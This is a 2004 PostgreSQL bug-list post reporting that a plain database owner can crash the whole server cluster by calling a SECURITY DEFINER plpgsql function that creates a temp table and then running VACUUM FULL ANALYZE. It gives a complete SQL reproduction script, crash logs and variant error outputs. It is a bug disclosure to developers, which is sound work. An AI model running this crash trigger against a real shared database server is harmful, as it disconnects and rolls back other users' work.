Denial of service via VACUUM, all backends exit and restart...

From: Sean Chittenden <chitt(at)speakeasy(dot)net>
To: PGBugs List <pgsql-bugs(at)postgresql(dot)org>
Subject: Denial of service via VACUUM, all backends exit and restart...
Date: 2004-10-04 07:18:28
Message-ID: 966E81D4-15D5-11D9-AD00-000A95C705DC@speakeasy.net
Views: Raw Message | Whole Thread | Download mbox | Resend email
Thread:
Lists: pgsql-bugs

There exists a crash that could easily be used as a denial of service
against PostgreSQL by any user who can call a trusted stored procedure
that makes use of temp tables. This DoS does not exist without the use
of a stored procedure (from what I can tell). The gist of it being:

CREATE DATABASE mydb WITH OWNER somedba;
\c mydb somedba
BEGIN;
-- Call a stored procedure that runs as SECURITY DEFINER, which creates
a temp table
-- Add one or more rows of data to the table
COMMIT;
VACUUM FULL ANALYZE;

Where somedba is the owner of the mydb database, but does not have any
abnormal privs (is just a user who happens to be a database owner).
When somedba runs VACUUM FULL ANALYZE, I get the following error during
the VACUUM which panics the entire cluster and causes all backends to
shutdown:

dba(at)mydb: [local] 22325 2004-10-03 10:51:15 PDT ERROR: relcache
reference tmptbl is not owned by resource owner
@: 21502 2004-10-03 10:51:20 PDT LOG: server process (PID 22325)
was terminated by signal 10
@: 21502 2004-10-03 10:51:20 PDT LOG: terminating any other
active server processes
@: 21502 2004-10-03 10:51:20 PDT LOG: all server processes
terminated; reinitializing
@: 22328 2004-10-03 10:51:21 PDT LOG: database system was
interrupted at 2004-10-03 10:50:03 PDT
@: 22328 2004-10-03 10:51:21 PDT LOG: checkpoint record is at
0/4C42FC8
@: 22328 2004-10-03 10:51:21 PDT LOG: redo record is at
0/4C42FC8; undo record is at 0/0; shutdown FALSE
@: 22328 2004-10-03 10:51:21 PDT LOG: next transaction ID: 14034;
next OID: 32678
@: 22328 2004-10-03 10:51:21 PDT LOG: database system was not
properly shut down; automatic recovery in progress
@: 22328 2004-10-03 10:51:21 PDT LOG: redo starts at 0/4C43008
@: 22328 2004-10-03 10:51:21 PDT WARNING: could not remove
database directory "/usr/local/pgsql/data/base/30827"
@: 22328 2004-10-03 10:51:24 PDT LOG: record with zero length at
0/57AA09C
@: 22328 2004-10-03 10:51:24 PDT LOG: redo done at 0/57AA070
@: 22328 2004-10-03 10:51:24 PDT LOG: database system is ready

I think this could be related to the bug I sent in a few days ago
regarding new databases not having the owner properly set when creating
a new database (ie, public is still owned by the owner of the template
database, same with information_schema, etc).

Regardless, here's an SQL script that reproduces this fatal condition:

\c template1 realdba
DROP DATABASE testdb;
CREATE USER testdba ENCRYPTED PASSWORD 'pass' NOCREATEDB NOCREATEUSER;
CREATE DATABASE testdb WITH OWNER testdba;

\c testdb realdba
ALTER SCHEMA public OWNER TO testdba;

\c testdb testdba
CREATE FUNCTION plpgsql_call_handler()
RETURNS language_handler
AS '$libdir/plpgsql', 'plpgsql_call_handler'
LANGUAGE c;
CREATE TRUSTED LANGUAGE plpgsql HANDLER plpgsql_call_handler;
REVOKE ALL PRIVILEGES ON DATABASE testdb FROM PUBLIC CASCADE;
GRANT CREATE,TEMPORARY ON DATABASE testdb TO testdba;
REVOKE ALL PRIVILEGES ON SCHEMA public FROM PUBLIC CASCADE;
GRANT USAGE ON SCHEMA public TO PUBLIC;
BEGIN;
CREATE FUNCTION public.tmptbl_foo() RETURNS VOID AS 'BEGIN
PERFORM TRUE FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relname =
\'tmptbl\'::TEXT AND c.relkind = \'r\'::TEXT AND
pg_catalog.pg_table_is_visible(c.oid);
IF NOT FOUND THEN
EXECUTE \'CREATE LOCAL TEMP TABLE tmptbl (key TEXT)
WITHOUT OIDS ON COMMIT DELETE ROWS;\';
ELSE
TRUNCATE TABLE tmptbl;
END IF;
RETURN;
END;' LANGUAGE 'plpgsql' SECURITY DEFINER;
GRANT EXECUTE ON FUNCTION public.tmptbl_foo() TO PUBLIC;
SELECT public.tmptbl_foo();
-- There has to be data in the TEMP TABLE otherwise the backend does
not crash
INSERT INTO tmptbl VALUES ('goozfraba');
COMMIT;
VACUUM FULL ANALYZE;

The output:
You are now connected to database "template1" as user "realdba".
DROP DATABASE
CREATE USER
CREATE DATABASE
You are now connected to database "testdb" as user "realdba".
ALTER SCHEMA
You are now connected to database "testdb" as user "testdba".
CREATE FUNCTION
CREATE LANGUAGE
REVOKE
GRANT
REVOKE
GRANT
BEGIN
CREATE FUNCTION
GRANT
tmptbl_foo
------------

(1 row)

COMMIT
psql:test.sql:36: server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
psql:test.sql:36: connection to server was lost
Exit 2

And what a user sees on a different window:
% psql somedb
somedb=> BEGIN ;
somedb=> INSERT INTO t1 (id) VALUES (1);
somedb=> SELECT * from t1;
id | i
----+---
1 |
(1 row)

-- Run the SQL script from above
somedb=> SELECT * from t1;
WARNING: terminating connection because of crash of another server
process
DETAIL: The postmaster has commanded this server process to roll back
the current transaction and exit, because another server process exited
abnormally and possibly corrupted shared memory.
HINT: In a moment you should be able to reconnect to the database and
repeat your command.
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Succeeded.
somedb=> SELECT * from t1;
id | i
----+---
(0 rows)

Happy happy joy joy. :-( I ran this test a dozen times, and
periodically I'd get the following error message:

psql:test.sql:36: ERROR: relcache reference pg_toast_81859 is not
owned by resource owner

instead of the crash, which leads me to believe that this could be
related to bgwriter as it seems to be execution time dependent and
bgwriter is the only component that I know of that could alter the
ordering of events via its calls to msleep(). I'm also of the belief
that pg_autovacuum seems to help mitigate this if I'm running this
script right as pg_autovacuum. If I split the above VACUUM commands
into two different VACUUM's:

VACUUM;
VACUUM FULL;

I get varying results:

COMMIT
psql:test.sql:36: ERROR: relcache reference tmptbl is not owned by
resource owner TopTransaction
ANALYZE
psql:test.sql:37: ERROR: relcache reference pg_toast_122795 is not
owned by resource owner TopTransaction

or sometimes:

psql:test.sql:36: ERROR: "pg_toast_122805" is not an index
psql:test.sql:37: ERROR: "pg_toast_122805" is not an index

or:

psql:test.sql:36: ERROR: could not open relation with OID 245679
psql:test.sql:37: ERROR: could not open relation with OID 245679

or:

psql:test.sql:36: ERROR: relcache reference pg_toast_204715 is not
owned by resource owner TopTransaction
psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by
resource owner

and sometimes:

psql:test.sql:36: ERROR: relcache reference pg_class is not owned by
resource owner TopTransaction
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
psql:test.sql:37: connection to server was lost

If I change things around so it's ANALYZE; VACUUM;, I can prod out a
different error message:

ANALYZE
psql:test.sql:36: WARNING: you don't own a lock of type
RowExclusiveLock
VACUUM
psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by
resource owner TopTransaction

and sometimes I just get:

psql:test.sql:36: WARNING: you don't own a lock of type AccessShareLock
VACUUM
VACUUM

Both of them I can't get when doing VACUUMs alone. :-( That last
error message is spooky because I don't know if the backend is in a
stable state or not.... given the other error messages, I'm spooked.

:-/ So, with the wide range of error messages that come from the same
script, I'm wondering if some memory isn't being trampled on, or the
new subtransaction code and VACUUM/ANALYZE don't get along, or it's
bgwriter somehow. *big shrug*

Regardless, I thought this would be of keen interest to many: hopefully
a fix can be found before 8.0 is released. -sc

PS I haven't tested to see if this bug exists in pre-8.X releases.

PPS Sorry for the barrage of bugs, I've been working offline for a few
days now... now driving and found a hot spot along 101.

/me gives 3 cheers for unprotected access points!!!

--
Sean Chittenden

Responses

Browse pgsql-bugs by date

  From Date Subject
Next Message Neil Conway 2004-10-04 07:19:11 Re: PLPGSQL and FOUND stange behaviour after EXECUTE
Previous Message Sean Chittenden 2004-10-04 07:16:28 bgwriter interfering with consistent view of system tables?